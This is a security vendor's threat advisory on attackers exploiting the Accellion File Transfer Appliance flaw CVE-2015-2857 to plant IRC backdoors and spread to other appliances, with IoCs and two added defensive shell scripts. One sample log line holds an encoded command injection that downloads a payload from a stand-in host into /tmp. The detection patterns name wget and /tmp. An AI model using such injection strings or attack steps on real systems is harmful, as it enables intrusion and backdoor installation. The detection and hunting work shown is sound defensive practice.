Threat Advisory: Accellion File Transfer Appliance Vulnerability



Niara Threat Advisories provide timely information regarding new attacks, along with how Niara helps companies quickly detect an attack to limit its impact and prevent it from establishing a persistent presence within the organization. Niara's security analytics platform provides a rich set of capabilities to automatically find attacks on the inside that evaded real-time defense systems and to focus security teams' efforts on the threats that matter. For more details on Niara's capabilities or to schedule a demo to see Niara in action, contact us at info@niara.com or at www.niara.com/contact

What did Niara discover?

Niara has discovered (as far as we know) the first sighting of CVE-2015-2857 in the wild. CVE-2015-2857 is the Accellion File Transfer Appliance (FTA) vulnerability discovered by Rapid7 in mid-2015. Late last month, Niara's security researchers identified a compromised Accellion FTA within an organization. The compromised FTA was being used as a beachhead to launch further attacks on other Accellion FTAs and build a cluster of compromised servers. While the motivation for this is not known, any compromise of a server storing important files should be taken very seriously.

What is the Accellion Secure File Transfer Appliance vulnerability?

The Accellion FTA provides secure file sharing and transfer for both internal and external recipients. In mid-2015, Rapid7 discovered a remote command execution (RCE) vulnerability in the Accellion FTA which could give cyber criminals near-complete access to the appliance, potentially resulting in the exfiltration of secure files. The vulnerability is made possible by insufficient sanitization of the oauth_token parameter, combined with how file permissions are configured by default. It is present in appliance software version FTA_9_11_200 and likely all prior versions. Accellion quickly released updated software (FTA_9_11_210) to address it. However, because patch cycles differ between organizations, unpatched appliances remain exposed. The Common Vulnerabilities and Exposures (CVE) identifier for this vulnerability is CVE-2015-2857.

Copyright 2015 Niara, Inc. All rights reserved.

The Attack Flow

1. Install an IRC backdoor on the compromised Accellion FTA
2. Connect to a command and control (C&C) server
3. Download exploit tools and instructions from another C&C server
4. Download the LoRD of IRAN HACKERS backdoor
5. Perform the exploit to compromise other vulnerable Accellion FTAs

Figure 1: Visualization of the attack

Technical Analysis

The attackers downloaded Kaiten, a well-known IRC backdoor, onto the compromised Accellion FTA. The backdoor served as the primary channel for the attackers to issue commands to the compromised server over the IRC protocol. The attackers then issued commands to download a compressed archive (tws.tar.gz) that contained all the tools and the blueprint for exploiting CVE-2015-2857 (a port scanner, binaries to conduct the exploit, instructions, etc.). Once tws.tar.gz was downloaded, it was decompressed and extracted.

The figures in this document show the rich investigative information that security analysts can easily retrieve from the Niara platform. This information provided invaluable assistance to Niara's own security researchers in identifying the exploit.

Figure 2: Commands being issued via the IRC channel used by the attackers to download tws.tar.gz.

Figure 3: Download of tws.tar.gz from a C&C server in Singapore.

Contents of Downloaded Instructions

The C&C server provided instructions and tools to exploit the vulnerability via a compressed archive. The file, named tws.tar.gz, has the following directory structure. By using file names starting with ".", the attackers ensured that the directory and its components would not be shown by a plain directory listing (ls without -a); they remain visible to ls -a and to find.

.tws/
.tws/.mshit
.tws/.ss
.tws/.start
.tws/.exp
.tws/.done/
.tws/.test
.tws/.range

Below is a description of the various components in the download.

.mshit is a script that emails the list of vulnerable Accellion FTA systems identified during port scanning to an address in the pegcity.info domain. The subject line of the email was "Accellion Secure File Transfer Servers".
.ss is an ELF executable, a well-known port scanner, with an md5sum of b51a52c9c82bb4401659b4c17c60f89f.
.start is a shell script for starting and stopping the reconnaissance (.ss) and exploit (.exp) components.
.exp is a shell script used for exploiting CVE-2015-2857.
.test is a shell script used to scan for vulnerable Accellion servers.
.range contains the range of IP addresses to be scanned.

The Exploit

Once the archive was downloaded onto the compromised Accellion FTA, the attackers issued commands to port scan class A networks to identify other vulnerable Accellion servers on the internet. Once additional vulnerable servers were identified, backdoor binaries were downloaded onto them. The steps followed by the attackers are explained below.

1. The port scanner (.ss) was used to scan the range of IP addresses specified in the .range file.
2. The results of the port scan, the IP addresses of hosts that responded to the scan (candidate Accellion FTAs), were stored in a file called bios.txt.
3. bios.txt was then passed to the .test script, which performed a curl request to each IP address listed in the file.
   a. The curl request is made to the URI /tws/getstatus, which returns the version of the Accellion server.
   b. Vulnerable servers are identified by grepping for 0.18 in the response to the curl request.
4. After identifying additional vulnerable servers, the attackers exploited them by executing the .exp script.

Figure 4: Content of the .test script that identifies vulnerable Accellion servers.

Figure 5: Contents of the .exp shell script.

The exploit script (.exp) shows how the attackers supplied UNIX commands in the oauth_token parameter to drop an ELF executable on each newly identified vulnerable Accellion system. The executable, named perl, is dropped under the /tmp/ directory of the newly identified system and executed. Niara's research showed that this executable is the Kaiten IRC binary. Its md5 is f7fb6c2471099f65b66eca4b14c78116.
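The .exp script injects shell commands through the oauth_token parameter. A defender can turn that around and hunt the appliance's web access logs for the same pattern. The script below is an added example, not code from the Niara advisory or from Accellion: it assumes Apache-style combined log lines (the FTA's real log format and the exact vulnerable endpoint path are not given in the advisory, so the /oauth/token path and the sample entries are constructed) and flags any oauth_token value that carries shell metacharacters, raw or percent-encoded, or references wget or /tmp/.

```shell
#!/bin/sh
# Added example: flag oauth_token values that look like command injection
# in Apache-style combined access logs. Not from the Niara advisory; the
# endpoint path and the log lines below are constructed for illustration.

# Constructed sample log (not real traffic). Line 3 carries a
# percent-encoded  '; wget http://203.0.113.9/perl -O /tmp/perl;  and
# line 4 a backtick substitution; lines 1 and 2 are benign.
SAMPLE_LOG='203.0.113.5 - - [25/Nov/2015:10:01:02 +0000] "GET /tws/getstatus HTTP/1.1" 200 51 "-" "curl/7.38.0"
198.51.100.7 - - [25/Nov/2015:10:01:05 +0000] "GET /oauth/token?oauth_token=abcDEF123 HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.5 - - [25/Nov/2015:10:01:09 +0000] "GET /oauth/token?oauth_token=x%27%3Bwget%20http%3A%2F%2F203.0.113.9%2Fperl%20-O%20%2Ftmp%2Fperl%3B HTTP/1.1" 500 0 "-" "curl/7.38.0"
203.0.113.5 - - [25/Nov/2015:10:01:11 +0000] "GET /oauth/token?oauth_token=x`id` HTTP/1.1" 200 12 "-" "curl/7.38.0"'

# Reads combined-format log lines on stdin and prints "CLIENT_IP TOKEN"
# for every request whose oauth_token value contains a shell metacharacter
# (; | ` $( or a %26%26 encoded &&), raw or percent-encoded, or mentions
# wget or /tmp/. A raw & ends the parameter in a query string, so the
# value is cut there; an attacker has to encode it as %26.
flag_oauth_injection() {
    grep 'oauth_token=' |
    awk '{
        # Field 7 is the request path in combined log format.
        split($7, parts, "oauth_token=")
        tok = parts[2]
        sub(/&.*/, "", tok)
        if (tok ~ /;|%3[bB]|[|]|%7[cC]|`|%60|[$][(]|%24%28|%26%26|\/tmp\/|%2[fF]tmp%2[fF]/ || tolower(tok) ~ /wget/) print $1, tok
    }'
}

# Usage on an appliance: flag_oauth_injection < /path/to/access_log
printf '%s\n' "$SAMPLE_LOG" | flag_oauth_injection
```

Matching on the encoded forms matters because the web server logs the request line as received; a token that decodes to `'; wget ...` never appears with a literal semicolon in the log.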

LorD of IRAN HACKERS

In addition to the Kaiten backdoor, the attackers downloaded another backdoor, a Perl script called bd, from the same server from which tws.tar.gz was downloaded. Niara believes the attackers did this to have a second channel of communication with the compromised Accellion FTA in case one of the channels went down.

Figure 6: Attackers issuing the command to download another backdoor, called bd.

Figure 7: Actual download of the backdoor (bd).

Figure 8: The connections established as a result of executing the backdoor (bd).

Figure 8 shows the successful connections that bd, the second backdoor, establishes with its C&C server. A quick Google search for "LorD of IRAN HACKERS SABOTAGE" (shown at the top of the figure) returns many results, indicating that it is a widely circulated backdoor. This backdoor is a Perl script that takes two arguments, an IP address and a port, which the attackers provided via the Kaiten IRC channel. In this attack, the C&C IP address provided was located in Russia and the port used was 45696.

How did Niara help?

Niara maintains high-fidelity forensics that are retained far longer than is possible with traditional monitoring systems, due in part to Niara's use of big data technologies. Forensics go all the way down to the raw data level, including PCAPs, which gives Niara complete visibility into what happened in the past. Because Niara maintains a complete forensic trail down to the packet level, Niara's security researchers were able to start with the initial evidence (communication with an unusual IP address) and perform threat hunting to see exactly what had happened. Without packet retention intertwined with Niara's analytics, this would not have been possible.

What Should You Do?

Organizations running vulnerable versions of the Accellion FTA can use the IoCs below to check whether they are compromised. As always, upgrade your Accellion servers to the latest version. The fix was made available in version FTA_9_11_210, so update your Accellion FTA software to that or a more recent release.

Network IoCs
- IRC connections to IPs located in Russia
- Noisy port scans on port 443 out to the internet across different class A or class B subnets
- wget downloads of archive files from IP addresses not resolved through DNS

Endpoint IoCs
- Hidden directories called .tws under /usr/include. The names may differ, so look at any newly created hidden directory.
- A hidden binary called .perl under the /tmp directory. The attackers change names often, so look at any suspicious hidden ELF executable.

About Niara

Niara's security analytics platform automates the detection of attacks that have bypassed an organization's perimeter defenses and dramatically reduces the time and skill needed to investigate and respond to security events. The solution applies machine learning algorithms and forensics to data from the network and security infrastructure to detect compromised users, entities, and malicious insiders, speed threat hunting efforts, and reduce the time for incident investigation and response by focusing security teams on the threats that matter. Headquartered in Sunnyvale, Calif., the company is backed by NEA, Index Ventures, and Venrock. For more information, visit www.niara.com.

Copyright 2015 Niara, Inc. All rights reserved. NIARA, NIARA INC., the NIARA logo and PETASECURE are trademarks of Niara Incorporated. All third-party trademarks, trade names, or service marks may be claimed as the property of their respective owners. Niara's technology and products are protected by issued and pending U.S. and foreign patents. 20151111
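The endpoint IoCs above are a short checklist a responder would run against each appliance. The script below is an added example, not code from Niara or Accellion: it takes the locations (/usr/include, /tmp), the .tws name and the two published MD5 hashes from this advisory, and because names change it matches hidden files in /tmp on the ELF magic rather than on the name .perl. The ROOT argument is a hypothetical prefix so the same hunt runs unchanged against a mounted disk image; the test tree built at the bottom is constructed, not an infected host.

```shell
#!/bin/sh
# Added example: hunt a host for the endpoint IoCs listed in the advisory.
# Not code from Niara or Accellion. Paths, the .tws name and the hashes come
# from the advisory; ROOT is a hypothetical prefix (defaults to /) and the
# test tree built below is constructed, not real.

MD5_SS='b51a52c9c82bb4401659b4c17c60f89f'      # .ss port scanner (from the advisory)
MD5_KAITEN='f7fb6c2471099f65b66eca4b14c78116'  # Kaiten binary dropped as /tmp/perl (from the advisory)

# MD5 of a file, using md5sum (Linux) or md5 (BSD/macOS).
file_md5() {
    if command -v md5sum >/dev/null 2>&1; then md5sum "$1" | cut -d' ' -f1
    else md5 -q "$1"; fi
}

# True when the file starts with the ELF magic bytes 7f 45 4c 46.
is_elf() {
    [ "$(od -An -tx1 -N4 "$1" | tr -d ' \n')" = "7f454c46" ]
}

# Prints one finding per line as "TYPE<tab>PATH". ROOT defaults to /.
hunt_fta_iocs() {
    root=${1%/}
    # 1. Hidden directories under /usr/include; .tws is the advisory's name,
    #    but any newly created hidden directory there deserves a look.
    if [ -d "$root/usr/include" ]; then
        find "$root/usr/include" -type d -name '.*' | while read -r d; do
            case "$(basename "$d")" in
                .tws) printf 'known_dir\t%s\n' "$d" ;;
                *)    printf 'hidden_dir\t%s\n' "$d" ;;
            esac
        done
    fi
    # 2. Hidden files under /tmp that are ELF executables. The dropped
    #    Kaiten binary is renamed often, so match the magic, not the name.
    if [ -d "$root/tmp" ]; then
        find "$root/tmp" -type f -name '.*' | while read -r f; do
            if is_elf "$f"; then printf 'hidden_elf\t%s\n' "$f"; fi
        done
    fi
    # 3. Any file inside a hidden path under either location whose MD5
    #    matches a hash published in the advisory.
    for base in "$root/usr/include" "$root/tmp"; do
        [ -d "$base" ] || continue
        find "$base" -type f -path '*/.*' | while read -r f; do
            case "$(file_md5 "$f")" in
                "$MD5_SS")     printf 'known_hash_ss\t%s\n' "$f" ;;
                "$MD5_KAITEN") printf 'known_hash_kaiten\t%s\n' "$f" ;;
            esac
        done
    done
    return 0
}

# Constructed test tree (not a real infected host): a .tws directory holding
# an .exp script, a hidden file carrying only an ELF header, a hidden
# non-ELF file and an ordinary file. Prints the tree's root path.
build_test_tree() {
    t=$(mktemp -d)
    mkdir -p "$t/usr/include/.tws" "$t/tmp"
    printf 'echo exploit\n' > "$t/usr/include/.tws/.exp"
    printf '\177ELF\002\001\001' > "$t/tmp/.perl"
    printf 'not a binary\n' > "$t/tmp/.cache"
    printf 'hello\n' > "$t/tmp/legit.txt"
    printf '%s\n' "$t"
}

# Demo against the constructed tree. On a suspect appliance run
# "hunt_fta_iocs /", or "hunt_fta_iocs /mnt/image" for a mounted disk image.
demo_root=$(build_test_tree)
hunt_fta_iocs "$demo_root"
rm -rf "$demo_root"
```

A hash match is the strongest signal, but treat a hidden ELF in /tmp or a new hidden directory under /usr/include as enough to pull the appliance for forensics: the advisory notes the attackers rename files between victims, so the hashes are a floor, not the whole test.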